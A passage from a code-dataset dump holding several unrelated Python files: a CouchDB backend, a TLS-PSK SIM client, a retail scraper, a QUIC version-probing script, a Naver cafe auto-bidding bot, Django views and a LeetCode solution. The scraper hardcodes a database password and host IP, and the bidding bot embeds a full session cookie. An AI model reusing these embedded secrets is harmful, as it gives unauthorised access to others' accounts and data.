\"\"\"Object handling all the connections to the couchdb server.\"\"\"\n\n def __init__(self, db):\n self.db = db\n self.save = db.save\n\n def get_definition(self, model_name):\n \"\"\"Get the scheme definition from the model_name.\n\n :param model_name: the name of the definition you want to retrieve\n\n \"\"\"\n results = db_definition(self.db)[model_name]\n for result in results:\n return result.value\n\n def get_definition_token(self, model_name):\n \"\"\"Return the token associated with a definition.\n\n :param model_name: the name of the definition you want to retrieve\n\n \"\"\"\n return db_model_token(self.db)[model_name]\n\n def get_data(self, model_name):\n \"\"\"Get the definition of the model data.\n\n :param model_name: the name of the definition you want to retrieve\n\n \"\"\"\n return db_data(self.db)[model_name]\n\n def get_data_item(self, model_name, data_item_id):\n \"\"\"Get a data-item and checks it behaves to the requested model\"\"\"\n key = [str(data_item_id), str(model_name)]\n data_items = db_data_item(self.db)[key]\n if len(data_items):\n data_item = data_items.rows[0]\n return data_item\n return None\n\n def create_data(self, model_name, data, data_id=None):\n \"\"\"Create a data to a model_name.\"\"\"\n if data_id:\n data_doc = self.db[data_id]\n data_id = data_doc.id\n else:\n data_doc = {\n 'type': 'data',\n 'model_name': model_name,\n }\n data_doc['data'] = data\n\n if data_id:\n self.db[data_id] = data_doc\n else:\n data_id, rev = self.db.save(data_doc)\n\n return data_id\n","sub_path":"daybed/backends/couchdb/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"357765417","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2020-2021 Pod Group Ltd.\n#\n# Authors:\n# - Kostiantyn Chertov <kostiantyn.chertov@podgroup.com>\n# - J. Félix Ontañón <felix.ontanon@podgroup.com>\n\nimport socket\nimport time\nfrom tlspsk import TLSClientSession\n\nfrom enosim.logger import logger\nfrom enosim.iccid import iccid2bin\n\n\ndef __tlssession(server, port, sim_key, sim_iccid, request):\n quit = False\n sock = None\n\n def callback(data):\n nonlocal quit, sock\n logger.info(data)\n if data == b\"bye\\n\":\n quit = True\n\n psk = bytes.fromhex(sim_key)\n session = TLSClientSession(\n server_names=server, psk=psk, psk_label=bytes.fromhex(sim_iccid), data_callback=callback, psk_only=True\n )\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((server, port))\n client_hello = session.pack_client_hello()\n logger.debug('client hello: {0}'.format(client_hello.hex()))\n sock.sendall(client_hello)\n\n parser = session.parser()\n step = 0\n logger.info('TLS1.3-PSK session established. Initialising operation.')\n\n while not quit:\n step += 1\n server_data = sock.recv(10*4096)\n if len(server_data) > 0:\n logger.debug(\"step {0}: {1}\".format(step, server_data.hex()))\n parser.send(server_data)\n data = parser.read()\n if data:\n logger.debug(\"data: {0}\".format(data.hex()))\n sock.sendall(data)\n quit = True\n\n data = bytes(request, 'utf-8')\n\n logger.debug('request: {0}'.format(data))\n app_data = session.pack_application_data(data)\n logger.debug('app_data: {0}'.format(app_data.hex()))\n\n sock.sendall(app_data)\n time.sleep(1)\n resp = sock.recv(4096)\n logger.debug('resp: {0}'.format(resp.hex()))\n parser.send(resp)\n\n time.sleep(0.5)\n resp = sock.recv(4096)\n logger.debug('resp: {0}'.format(resp.hex()))\n parser.send(resp)\n\n sock.sendall(session.pack_close())\n sock.close()\n logger.debug('done!')\n\n\ndef simulate_ztp(server, port, sim_key, sim_iccid, device_id):\n nibbled_iccid = iccid2bin(sim_iccid).hex()\n request = 'GET /v1/config/{0}?iccid={1} HTTP/1.1\\x0d\\x0a\\x0d\\x0a'.format(device_id, nibbled_iccid)\n logger.debug('request: {}'.format(request))\n\n return __tlssession(server, port, sim_key, nibbled_iccid, request)\n\n\ndef simulate_stc(server, port, sim_key, sim_iccid, device_id, json_data):\n data_length = len(json_data)\n nibbled_iccid = iccid2bin(sim_iccid).hex()\n request = 'POST /v1/data/{0}?iccid={1} HTTP/1.1\\x0d\\x0a'.format(device_id, nibbled_iccid) +\\\n 'Host: pod.iot.platform\\x0d\\x0a' +\\\n 'Content-Length: {0:d}\\x0d\\x0a\\x0d\\x0a{1}'.format(data_length, json_data)\n logger.debug('request: {}'.format(request))\n\n return __tlssession(server, port, sim_key, nibbled_iccid, request)\n","sub_path":"enosim/tlsclient.py","file_name":"tlsclient.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"92637063","text":"import threading\n\nimport tensorflow as tf\nfrom keras.models import load_model\nfacial_expression_model_path = 'models/face_expression.hdf5'\nfall_model_path = 'models/fall_detection.hdf5'\n\nclass MyModel:\n def __init__(self,path):\n self.path=path\n self.model_graph=tf.Graph()\n self.model_sess=tf.Session(graph=self.model_graph)\n self.model=self.load()\n\n\n def load(self):\n with self.model_sess.as_default():\n with self.model_graph.as_default():\n return load_model(self.path)\n\n\n def model_predict(self,roi):\n with self.model_sess.as_default():\n with self.model_graph.as_default():\n return self.model.predict(roi)\n\n\n\n\n","sub_path":"mymodel.py","file_name":"mymodel.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"615920835","text":"from common_module import *\r\n\r\nclass ClubMonaco_Extractor(object):\r\n def extract_categories(self, text):\r\n log_display('ClubMonaco - extracting categories')\r\n soup = get_soup(text)\r\n categories = []\r\n divisions = []\r\n division_items = soup.select('.menuLinks')\r\n for division in division_items:\r\n if 'with-flyout' in division.a['class']:\r\n division_name = division.a.text.strip()\r\n for class_item in division.a['class']:\r\n if class_item.find('flyout-') != -1:\r\n division_flyout_class = class_item\r\n divisions.append({'name' : division_name, 'flyout_class' : division_flyout_class })\r\n base_url = 'http://www.clubmonaco.ca'\r\n pattern_category_id = re.compile('categoryId=(\\d+)')\r\n for division in divisions:\r\n division_menu_div = soup.select('#%s' % division['flyout_class'])[0]\r\n division_menu_item_groups = division_menu_div.select('.col')\r\n for menu_group in division_menu_item_groups:\r\n group_name = string.capwords(menu_group.h3.text.strip())\r\n group_subitems = menu_group.select('.leftnav-group > li')\r\n for subitem in group_subitems:\r\n subitem_name = subitem.a.text.strip()\r\n subitem_url = base_url + subitem.a['href'] \r\n category_id = pattern_category_id.findall(subitem_url)[0]\r\n category_name = division['name'] + ' : ' + group_name + \" : \" + subitem_name\r\n categories.append({'name' : category_name, 'url' : subitem_url})\r\n return categories\r\n def extract_category_productlist(self, text, category_id):\r\n log_display('ClubMonaco - extracting products for category')\r\n base_url = 'http://www.clubmonaco.ca'\r\n soup = get_soup(text)\r\n pattern_product_id = re.compile('productId=(\\d+)')\r\n products = []\r\n product_items = soup.select('.product')\r\n for product in product_items:\r\n product_url = base_url + product.select('.product-details')[0].dt.a['href']\r\n product_id = pattern_product_id.findall(product_url)[0]\r\n product_name = string.capwords(product.select('.product-details')[0].dt.a.text)\r\n products.append({'category_id' : category_id, 'id' : product_id, 'name' : product_name, 'url' : product_url})\r\n return products\r\n def extract_product(self, text, base_product_url):\r\n log_display('ClubMonaco - extracting product')\r\n soup = get_soup(text)\r\n swatches = {}\r\n swatch_items = soup.select('.swatches li')\r\n if not swatch_items:\r\n return None\r\n for item in swatch_items:\r\n swatch_name = item.text.strip()\r\n swatch_url = item.img['src']\r\n swatch_id = item['value']\r\n swatch_product_url = base_product_url + '&color=' + swatch_id\r\n swatches.update({swatch_id: {'name' : swatch_name, 'url' : swatch_url, 'product_url' : swatch_product_url}})\r\n # get prices for swatches\r\n pattern_skus = re.compile('skusGen\\.push\\([^;]+\\);', re.DOTALL)\r\n pattern_color_name = re.compile('color: \"([^\"]+)\"')\r\n pattern_color_id = re.compile('colorCode: \"([^\"]+)\"')\r\n pattern_price_regular = re.compile(\"baseUnformatted: ([\\d.]+)\")\r\n pattern_price_sale = re.compile(\"currentUnformatted: ([\\d.]+)\")\r\n sku_items = pattern_skus.findall(text)\r\n for item in sku_items:\r\n if len(item.replace('skusGen.push(', '').replace(');', '').strip()) == 0:\r\n # empty - may be old sku?\r\n continue\r\n color_id = pattern_color_id.findall(item)[0].strip()\r\n if color_id not in swatches.keys():\r\n # empty - may be unavailable ? \r\n continue\r\n color_name = pattern_color_name.findall(item)[0].strip()\r\n price_regular = float(pattern_price_regular.findall(item)[0].strip())\r\n price_sale = float(pattern_price_sale.findall(item)[0].strip())\r\n if price_sale == price_regular:\r\n price_sale = 0\r\n swatches[color_id].update({'price_regular' : price_regular, 'price_sale' : price_sale, 'pics' : []})\r\n # get description\r\n description = ''\r\n if soup.select('#tab-details') and soup.select('#tab-details')[0].p:\r\n description = soup.select('#tab-details')[0].p.text\r\n # grab pics\r\n pattern_color_slice = re.compile('colorSliceValuesGen\\.push\\([^;]+\\);', re.DOTALL)\r\n pattern_photo_color_id = re.compile('colorId: \"([^\"]+)\"')\r\n pattern_photo_color_name = re.compile('colorName: \"([^\"]+)\"')\r\n pattern_photo_urls = re.compile('enhancedImageURL: \"([^\"]+)\"')\r\n photo_section_items = pattern_color_slice.findall(text)\r\n for photo_item in photo_section_items:\r\n color_id = pattern_photo_color_id.findall(photo_item)[0].strip()\r\n if not color_id in swatches.keys():\r\n continue \r\n color_name = pattern_photo_color_name.findall(photo_item)[0].strip()\r\n photo_urls = pattern_photo_urls.findall(photo_item)\r\n swatches[color_id].update({'pics' : photo_urls})\r\n return {'description' : description, 'swatches' : swatches }\r\n\r\nclass ClubMonaco_Processor(object):\r\n def __init__(self, retailer_db, extractor):\r\n self.retailer_db = retailer_db\r\n self.extractor = extractor\r\n self.extraction_id = scraper_get_extraction_id()\r\n self.page_pause = 3\r\n self.name = 'clubmonaco'\r\n def insert_categories(self, extraction_id, categories):\r\n log_display('ClubMonaco_Processor - inserting categories')\r\n query = 'replace into clubmonaco_category(extraction_id, id, name, url) value (%s, %s, %s, %s)'\r\n params = []\r\n for idx, category in enumerate(categories):\r\n params.append((extraction_id, idx, category['name'], category['url']))\r\n log_display('ClubMonaco_Processor - %s categories to insert' % len(params))\r\n connection = self.retailer_db.get_connection()\r\n cursor = connection.cursor()\r\n cursor.executemany(query, params)\r\n connection.commit()\r\n cursor.close()\r\n def insert_category_productlist(self, extraction_id, products):\r\n log_display('ClubMonaco_Processor - inserting category product list')\r\n query = 'replace into clubmonaco_category_productlist(extraction_id, category_id, product_id, name, url) value (%s, %s, %s, %s, %s)'\r\n params = []\r\n for product in products:\r\n params.append((extraction_id, product['category_id'], product['id'], product['name'], product['url']))\r\n log_display('ClubMonaco_Processor - %s category products to insert' % len(params))\r\n connection = self.retailer_db.get_connection()\r\n cursor = connection.cursor()\r\n cursor.executemany(query, params)\r\n connection.commit()\r\n cursor.close()\r\n def insert_product(self, extraction_id, product):\r\n log_display('ClubMonaco_Processor - inserting product')\r\n product_query = 'replace into clubmonaco_product(extraction_id, id, name, description, url, color_id, color_name, color_pic, price_regular, price_sale) value (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\r\n photo_query = 'replace into clubmonaco_productphoto(extraction_id, product_id, color_id, url) value (%s, %s, %s, %s)'\r\n product_params = []\r\n photo_params = [] \r\n for swatch_id, swatch in product['swatches'].items():\r\n product_params.append((extraction_id, product['id'], product['name'], product['description'], swatch['product_url'], swatch_id, swatch['name'], swatch['url'], swatch['price_regular'], swatch['price_sale']))\r\n for photo_url in swatch['pics']:\r\n photo_params.append((extraction_id, product['id'], swatch_id, photo_url))\r\n log_display('ClubMonaco_Processor - inserting %s product photos' % len(photo_params))\r\n connection = self.retailer_db.get_connection()\r\n cursor = connection.cursor()\r\n cursor.executemany(product_query, product_params)\r\n cursor.executemany(photo_query, photo_params)\r\n connection.commit()\r\n cursor.close()\r\n def run(self):\r\n if self.extraction_id is None:\r\n log_display('ClubMonaco - inserting fresh extraction run')\r\n self.extraction_id = self.retailer_db.scrape_get_extraction_id_for_run(self.name)\r\n log_display('ClubMonaco - extraction id is %s' % self.extraction_id)\r\n home_url = 'http://www.clubmonaco.ca/'\r\n log_display('ClubMonaco - getting homepage for categories via url %s' % home_url)\r\n text = get_page(home_url)\r\n categories = self.extractor.extract_categories(text)\r\n self.insert_categories(self.extraction_id, categories)\r\n identified_products = {}\r\n for cidx, category in enumerate(categories):\r\n page_no = 0\r\n while True:\r\n time.sleep(self.page_pause)\r\n page_no = page_no + 1\r\n url = '%s&size=99&page=%s' % (category['url'], page_no)\r\n log_display('ClubMonaco - getting category product list via url %s' % url)\r\n text = get_page(url)\r\n products = self.extractor.extract_category_productlist(text, cidx)\r\n self.insert_category_productlist(self.extraction_id, products)\r\n for product in products:\r\n if product['id'] not in identified_products.keys():\r\n identified_products[product['id']] = product\r\n soup = get_soup(text)\r\n if not soup.select('.next'):\r\n break\r\n for pid, product in identified_products.items():\r\n time.sleep(self.page_pause)\r\n log_display('ClubMonaco - getting product via url %s' % product['url'])\r\n text = get_page(product['url'])\r\n product_info = self.extractor.extract_product(text, product['url'])\r\n if product_info is None:\r\n continue\r\n product.update(product_info)\r\n self.insert_product(self.extraction_id, product)\r\n self.retailer_db.scrape_update_endtime_for_extraction_id(self.extraction_id)\r\n\r\nconfig = {\r\n 'RetailerDB' : {\r\n 'user' : 'Akon',\r\n 'pwd' : 'Ef351egUAQ-jZ-V',\r\n 'host' : '104.236.57.214',\r\n 'db' : 'retailers'\r\n }\r\n}\r\nretailerDB = MySQLAdapter(config['RetailerDB'])\r\nextractor = ClubMonaco_Extractor()\r\nprocessor = ClubMonaco_Processor(retailerDB, extractor)\r\n\r\nprocessor.run()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"scripts/f21/clubmonaco.py","file_name":"clubmonaco.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"118182977","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys, time, os, struct, random\nimport asyncio\n\n\ndef data_coll(_rtt):\n global recv_i, sum_rtt\n\n recv_i += 1\n sum_rtt += _rtt\n\n\ndef len_data_head(data):\n len_idh = 1 # data[0]\n len_version = 4 # data[1:5]\n len_DCIL = 1 # data[5]\n len_DCID = data[len_idh + len_version] # data[6:6+len_DCIL]\n len_SCIL = 1 # data[6+len_DCIL]\n len_SCID = data[len_idh + len_version + len_DCIL + len_DCID]\n return 7 + len_DCID + len_SCID # 7 + data[6+data[5]] + data[5]\n\n\ndef dummy_version_packet(f): # 1:23 0:15\n if f: # QUIC Long Header\t[8-f][0-f] 00000000(32bitVer) DCID Len == SCID Len == 8\n # qdata = struct.pack('!B',random.randint(0,255)|0x80) + b'\\x00\\x00\\x00\\x00\\x50' + os.urandom(8)\n qdata = struct.pack('!B',random.randint(0,255)|0x80) + struct.pack('!L',random.randint(0,0xffffffff)&0xfafafafa|0x0a0a0a0a) + b'\\x08' + os.urandom(8) + b'\\x08' + os.urandom(8) + b'\\x00'*1177\n len_h = 23\n else: # SCID Len == 0 DCID Len == [8,20]\n # qdata = struct.pack('!B',random.randint(0,255)&0x7d|9) + os.urandom(8) + struct.pack('!L',random.randint(0,0xffffffff)&0xfafafafa|0x0a0a0a0a) # '\\x00\\x00\\x00\\x00'\n _rl = random.randint(8,0x14)\n qdata = struct.pack('!B',random.randint(0,255)|0x80) + random.choice([b'\\xff',b'\\x00']) + os.urandom(3) + struct.pack('!B',_rl) + os.urandom(_rl) + b'\\x00'*1186\n len_h = 7 + _rl\n print('\\tSend Query: %s'%' '.join('%02X'%x for x in qdata[:len_h]))\n return qdata\n '''\n struct.pack('!B',random.randint(0,255)&0x7d|9) # random.randint(0,7)*16+9+random.choice([0,4]) [0-7][9|d]\n struct.pack('!Q',random.randint(0,0xFFFFFFFFFFFFFFFF)) # os.urandom(8) CID(64bit)\n struct.pack('!L',random.randint(0,0xffffffff)&0xfafafafa|0x0a0a0a0a) # '*a*a*a*a' Ver(32bit)\n '''\n\nclass UdpHandler:\n global query_count\n\n def __init__(self, target_hostname, target_port):\n self.target_hostname = target_hostname\n self.target_port = target_port\n self.recv_count = 0\n\n def connection_made(self, transport):\n self.transport = transport\n self.s_time = time.time()\n\n for _ in range(query_count):\n self.transport.sendto(dummy_version_packet(random.randint(0,1)))\t# random.randint(0,1)\n\n def datagram_received(self, data, addr):\n global QUIC_Ver\n if self.recv_count == 0:\n len_h = len_data_head(data)\n QUIC_Ver = str(data[len_h:])[2:-1] # .decode('utf8','ignore')\n self.recv_count += 1\n print(' Recv Data:\\t(%d/%d)\\n %r'%(self.recv_count, query_count, data))\n data_coll(time.time() - self.s_time)\n # print('\"{}:{}\" is enabled QUIC.\\tRTT={}ms'.format(self.target_hostname, self.target_port, time.time() - self.s_time))\n if self.recv_count == query_count: self.transport.close()\n\n def error_received(self, transport):\n print('\"{}:{}\"\\t{}'.format(self.target_hostname, self.target_port, transport))\n self.transport.close()\n\n def connection_lost(self, transport):\n loop = asyncio.get_event_loop()\n loop.stop()\n\n\ndef stop_event_loop(event_loop, timeout, s_addr, q_port):\n \"\"\"Terminates event loop after the specified timeout.\"\"\"\n def timeout_handler():\n event_loop.stop()\n\n print('\"{}:{}\" \\tTimeout...\\t{}ms'.format(s_addr, q_port, timeout*1000))\n event_loop.call_later(timeout, timeout_handler)\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n #print(\"Start:\",time.ctime(), time.time())\n global recv_i, sum_rtt, query_count\n recv_i = sum_rtt = 0\n query_count = 3\n query_timeout = 1.6\n query_port = 443\n server_addr = \"127.0.0.1\"\n if len(sys.argv) > 1 : server_addr = sys.argv[1]\n if len(sys.argv) > 2 : query_port = sys.argv[2]\n# args = cli.parse_args(sys.argv[1:])\n# server_addr = net.resolve_hostname(args.host)\n\n event_loop = asyncio.get_event_loop()\n connect = event_loop.create_datagram_endpoint(\n lambda: UdpHandler(server_addr, query_port),\n remote_addr=(server_addr, query_port)\n )\n event_loop.run_until_complete(connect)\n stop_event_loop(event_loop, query_timeout, server_addr, query_port)\n event_loop.run_forever()\n #print(\"End:\",time.ctime(), time.time())\n if recv_i:\n print('\"{}:{}\" is enabled QUIC. ({})\\tRTT={:.2f}ms\\t{}/{}'.format(server_addr, query_port, QUIC_Ver, sum_rtt*1000/recv_i, recv_i, query_count))\n with open('QUIC-r.txt', 'a') as wf: wf.write('%s\\t%s\\t%.2f\\t%d|%d\\t%s\\n'%(time.strftime('%Y%m%d %X'), server_addr, sum_rtt*1000/recv_i, recv_i, query_count, QUIC_Ver))\n\nif __name__ == '__main__':\n main()\n","sub_path":"quic_version_detector/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425486301","text":"\n#%%\n\nimport prod_1 as p\nimport pandas as pd\nfrom pandas.io.json import json_normalize\nimport json\nfrom openpyxl import load_workbook\n\np.open_window.browser_setup()\n\n#%%\n\n# PRODUCT NUMBER\nproduct_number = 281175\n\n#CAFE NUMBER\ncafe_name = '7silverfactory7'\n\n# 7silverfactory7\n# dodohi0607\n# soojip114\n\n\nnaver_cookie = 'NRTK=ag#all_gr#1_ma#-2_si#0_en#0_sp#0; NNB=J2ZVYNYXP2MV6; nx_ssl=2; ASID=77f773540000017630e9510000000067; nid_inf=959657076; NID_AUT=KbzwToCw88MVjp3A/Q9SZnknWKQ8yGm6JmX3+mYIOuETiZgaoCpiT6g3ik9LdT5Y; NID_JKL=lNlg2g4l0j+U4oZxs4OTLWsaZr9zUpYRdypoXffXy3A=; NID_SES=AAABo5uEtwhMXAL5KJ7cY5i5J6O53xjuQSTbVC9tUB3vaK7YFdrtHnlaQN4StnwpapRnitS/7PnaQyP8njyY4zNvSoLhSUZoBea9c04hrKb2Y9LUkqDJIFzMxMjHq12l9zHX43XRQSCmsNodvUgZdiuHV7eGkCYleQfXX97YyJXoZyLhOF6i8WjEBS5E3zaz7Hl0lu4+xzjIMuiLaPwVv+BF9T1n8rzrUAIgfdFGnBBoduFiVlwQ5E+opHX+2i9J8T0w2t+Px1L2SM/i5FJ/wXIh0sUp8vnNqu9ziDOPp924vK66mn6itHgDJmABIRNZlLChiTzhzXOwgjIXjaR8SlhNaJZiQhz+fjEcjiXbJ+D8r9PY902NH5h5Gu2UKkPKNLcJNqruO3Wb8/uwVBXDUdkQRaVEIV2RXJn89tL0f4p8mzUGbeWnG98HVEW7KItvCD84f7vtZXnffowWMEzD78bKSHTO3vl4wUZYHvO/vKiTQdJq+T7d20i6ZjOYTNXl9n7k/XFPjyODXXDcWlXB9YlrQLgmPKWCoDUIcYWN9LFXyMbiSkAm2p3YMVOfjOmkv5gSQQ=='\n\n\n\n# TIME\ntime = p.datetime.time(21, 8, 50)\n# ALPHA\nalpha = 200\n# MAX BID\nmax_bid = 15.0 # 만원\n# MIN BID\nmin_bid = 1.0 # 만원\n\n\n\n\n\n# URL\nurl = \"https://cafe.naver.com/{0}/{1}\".format(cafe_name, product_number)\n\n# Cafe number\nif cafe_name == \"soojip114\":\n cafe_number = 12097718\nelif cafe_name == \"dodohi0607\":\n cafe_number = 19278526\nelse:\n cafe_number = 23303375\n\n\n# Delta\ndelta = 0.85\n# Max BID and Min BID Multiplier\nmax_bid *= 10000\nmin_bid *= 10000\n# Run time\nrun_time = p.datetime.datetime.combine(p.datetime.date.today(), time)\np.browser.get(url)\n\n#%%\n\n\ndef price_list(product_number = product_number, naver_cookie = naver_cookie):\n\n headers = {\n 'authority': 'apis.naver.com',\n 'accept': 'application/json, text/plain, */*',\n 'x-cafe-product': 'pc',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',\n 'origin': 'https://cafe.naver.com',\n 'sec-fetch-site': 'same-site',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'accept-language': 'en-US,en;q=0.9,es;q=0.8,ko;q=0.7',\n 'cookie': naver_cookie\n }\n\n params = (\n ('requestFrom', 'A'),\n ('orderBy', 'asc'),\n )\n\n response_price_list = p.requests.get('https://apis.naver.com/cafe-web/cafe-articleapi/cafes/{0}/articles/{1}/comments/pages/1'.format(cafe_number, product_number), headers=headers, params=params)\n\n #print(response_price_list.elapsed.total_seconds())\n\n # print('HTTP Status: {0}\\nReason: {1}'.format(response_price_list.status_code, response_price_list.reason))\n\n return response_price_list\n\ndef final_price():\n global final_list\n min_price = pd.Series([min_bid], [1004], name='content')\n list1 = json.loads(price_list(product_number, naver_cookie).text)\n list2 = json_normalize(list1['comments']['items'])['content'].replace(',','', regex=True).replace('요','', regex=True).replace('원','', regex=True).replace('~','', regex=True).replace(' ','', regex=True)\n list3 = list2[list2.apply(lambda x: x.isdigit())].astype(int)\n final_list = list3[list3.apply(lambda x: (x % 100 == 0) and (x < 2000000))].append(min_price)\n final_price = int(max(final_list))\n return final_price\n\n\n\n# '원' '요' '~', ',' 및 스페이스 삭제 후 숫자축출\n# 200만원 까지만 집계\n\n# '.', '\\n' 마크가 있으면 제외됨\n\ndef final_output(final_price, alpha, test = \"Y\"):\n\n global start_time\n global finish_time\n global time_taken\n global bid\n \n # Taking timestamp\n start_time = str(p.datetime.datetime.now())\n start_time2 = p.time.time()\n\n # Get the browser refresh\n p.browser.switch_to.frame(\"cafe_main\")\n\n bid = final_price() + alpha\n\n try:\n p.WebDriverWait(p.browser, 10).until(\n p.EC.visibility_of_element_located((p.By.CLASS_NAME, \"register_box\")))\n finally:\n\n if test == \"N\": # PRODUCTION\n\n # This piece will not write anything as this will run with scheduler\n elem = p.browser.find_element_by_class_name(\"comment_inbox_text\")\n if bid < max_bid:\n elem.send_keys(bid)\n p.browser.find_element_by_class_name(\"register_box\").click()\n else:\n elem.send_keys(bid)\n\n else: # Practice. This piece will write because it will only be used outside the scheduler\n if bid < max_bid:\n print(\"bid executed\")\n else:\n print(\"no bid executed\")\n\n p.browser.switch_to_default_content()\n finish_time = str(p.datetime.datetime.now())\n time_taken = p.time.time() - start_time2\n\n\n# 엑셀파일 저장\ndef saving_excel():\n # new dataframe with same columns\n printing_results = pd.DataFrame({'id_vars':['bid', 'alpha', 'max_bid', 'start_time', 'finish_time', 'time_taken', 'url', 'run_time','final_list'],'value_vars':[bid, alpha, max_bid, start_time, finish_time, time_taken, url, run_time, final_list]})\n\n writer = pd.ExcelWriter('saving_results.xlsx', engine='openpyxl')\n # try to open an existing workbook\n writer.book = load_workbook('saving_results.xlsx')\n # copy existing sheets\n writer.sheets = dict((ws.title, ws) for ws in writer.book.worksheets)\n\n # read existing file\n reader = pd.read_excel(r'saving_results.xlsx')\n # write out the new sheet\n printing_results['value_vars'].to_excel(writer, sheet_name=\"Sheet1\", startcol=writer.sheets['Sheet1'].max_column, index = False,header= False) #startrow=len(reader)+1)\n\n writer.close()\n\ndef final_job(run_time = run_time, delta = delta):\n execution_time = p.time.strptime(str(run_time + p.datetime.timedelta(seconds=9)), '%Y-%m-%d %H:%M:%S') # string 에서 시간으로 변경\n target_time = p.time.mktime(execution_time) - delta # 시간을 epoch 로 변경. 시간 미세하게 delta 로 조정\n p.browser.get(url)\n sleeping = p.time.sleep(target_time - p.time.time())\n final_output(final_price, alpha, \"N\")\n saving_excel()\n\n#%%\n\n# Do not run if this is not a test\n\nfinal_output(final_price, alpha, \"Y\")\n\n#%%\n\n\n# Review Run\n\nprint(final_list)\nprint(\"\\n--- bid: %s ---\" % bid)\nprint(\"--- alpha: %s ---\" % alpha)\nprint(\"--- max bid: %s ---\" % max_bid)\nprint(\"\\n--- %s seconds ---\" % start_time)\nprint(\"--- %s seconds ---\" % finish_time)\nprint(\"--- %s seconds ---\" % time_taken)\nprint(\"\\n--- url: %s ---\" % url)\nprint(\"--- run time: %s ---\" % run_time)\n\n\n#%%\n\n#############################################################################################\n#############################################################################################\n# PRODUCTION!!!!!!!!!\n\n# This code is to hide the main tkinter window\nroot = p.tkinter.Tk()\nroot.withdraw()\n\n# Message Box\np.messagebox.showinfo(\n \"check\", \"***ALPHA: {} ***\\n***MAX BID: {} ***\\n***TIME: {} ***\\n***URL: {} ***\".format(alpha, max_bid, run_time, url))\n\n\n# Production scheduler\n\nsched = p.BackgroundScheduler()\nsched.start()\n\njob = sched.add_job(final_job, 'date', run_date=run_time)\n\n#############################################################################################\n#############################################################################################\n\n\n#%%\n\n# Wrap-up\n\nsched.shutdown(wait=False)\n\n\n# %%\n\n# list(a.keys())\n# list1 = json.loads(price_list().text)\n# df = json_normalize(list1['comments']['items'])\n# df\n\n\n\n# Reference\n\n# https://developers.naver.com/docs/cafe/api/\n# https://blog.naver.com/popqser2/221430894929\n# https://requests.readthedocs.io/en/latest/api/\n# https://stackoverflow.com/questions/47242845/pandas-io-json-json-normalize-with-very-nested-json\n\n# 엑셀파일 생성\n# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.to_excel.html\n# https://medium.com/better-programming/using-python-pandas-with-excel-d5082102ca27\n\n# %%\n\n\n\n","sub_path":"골드/경매/prod_6.py","file_name":"prod_6.py","file_ext":"py","file_size_in_byte":8047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161590039","text":"from datetime import (\n datetime,\n timedelta\n)\n\nfrom django.shortcuts import (\n render,\n redirect\n)\nfrom django.urls import reverse\n\nfrom ..models import (\n Bulletin,\n Product,\n VacationSettings\n)\nfrom django.core.paginator import Paginator\n\n\ndef index(request):\n vacation_settings = VacationSettings.load()\n\n if 'cart' not in request.session:\n request.session['cart'] = []\n\n if vacation_settings.active:\n return redirect(reverse('shop:vacation'))\n else:\n return redirect(reverse('shop:main'))\n\n\ndef vacation_index(request):\n return render(request, 'shop/temp_index.html')\n\n\ndef main_index(request):\n today = datetime.now()\n month_ago = today - timedelta(days=int(30))\n all_products = Product.objects.filter(status='A').order_by('-created_at').prefetch_related('pen').prefetch_related('image')\n paginator = Paginator(all_products, 24)\n products = paginator.page(1)\n context = {\n 'products': products,\n 'bulletins': Bulletin.objects.filter(updated_at__range=(month_ago, today), active=True).order_by('-updated_at')[:1]\n }\n\n return render(request, 'shop/index.html', context)\n\n\ndef news(request):\n bulletins = Bulletin.objects.filter(active=True).order_by('-updated_at')\n context = {\n \"bulletins\": bulletins,\n }\n return render(request, 'shop/news.html', context)\n\n\ndef not_found(request, exception):\n return render(request, 'shop/404.html')\n","sub_path":"apps/shop/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496244131","text":"# LC 654. Maximum Binary Tree\n\n'''\nYou are given an integer array nums with no duplicates. A maximum binary tree can be built recursively from nums using the following algorithm:\n\nCreate a root node whose value is the maximum value in nums.\nRecursively build the left subtree on the subarray prefix to the left of the maximum value.\nRecursively build the right subtree on the subarray suffix to the right of the maximum value.\nReturn the maximum binary tree built from nums.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n'''\n\nclass Solution:\n def constructMaximumBinaryTree(self, nums: List[int]) -> Optional[TreeNode]:\n return self.monostack(nums)\n\n # O(n^2) time | O(n) space\n def recursive(self, nums: List[int]) -> Optional[TreeNode]:\n if len(nums) == 0:\n return None\n\n max_idx = 0\n\n for i in range(len(nums)):\n if nums[i] > nums[max_idx]:\n max_idx = i\n\n node = TreeNode(nums[max_idx])\n node.left = self.constructMaximumBinaryTree(nums[:max_idx])\n node.right = self.constructMaximumBinaryTree(nums[max_idx + 1:])\n\n return node\n\n # O(n) time | O(n) space\n def monostack(self, nums: List[int]) -> Optional[TreeNode]:\n node = TreeNode(float('inf'))\n stack = 